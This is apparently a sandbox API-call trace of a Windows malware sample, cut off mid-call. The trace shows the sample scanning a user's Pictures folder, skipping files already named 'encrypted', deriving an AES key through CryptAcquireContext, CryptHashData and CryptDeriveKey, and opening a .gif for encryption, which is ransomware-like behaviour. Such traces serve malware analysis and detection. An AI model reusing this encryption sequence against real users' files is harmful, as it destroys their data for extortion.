lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x908cae0, ftLastWriteTime.dwHighDateTime=0x1d5c09c, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0x7c20c0 [0040.884] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x908cae0, ftLastWriteTime.dwHighDateTime=0x1d5c09c, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0x7c20c0 [0040.884] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0040.884] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ci\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xmQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mQr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qr1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="41yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yk8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hNSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SN8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X6D.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.886] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.886] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.887] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.887] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.887] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.887] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.887] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.887] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.887] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ea0bb0, ftCreationTime.dwHighDateTime=0x1d5c145, ftLastAccessTime.dwLowDateTime=0x908cae0, ftLastAccessTime.dwHighDateTime=0x1d5c09c, ftLastWriteTime.dwLowDateTime=0x908cae0, ftLastWriteTime.dwHighDateTime=0x1d5c09c, nFileSizeHigh=0x0, nFileSizeLow=0x1369, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="3Q41yk8hNSN8X6D.gif", cAlternateFileName="3Q41YK~1.GIF")) returned 0x7c2240 [0040.887] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.887] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.887] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.887] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.887] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.888] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.888] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0040.888] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.888] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.888] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.889] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.889] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.889] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.889] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.889] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0040.889] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.889] CryptDestroyHash (hHash=0x7c2100) returned 1 [0040.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\3Q41yk8hNSN8X6D.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\3q41yk8hnsn8x6d.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.890] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.890] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0040.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0040.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0040.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.891] RtlAllocateHeap 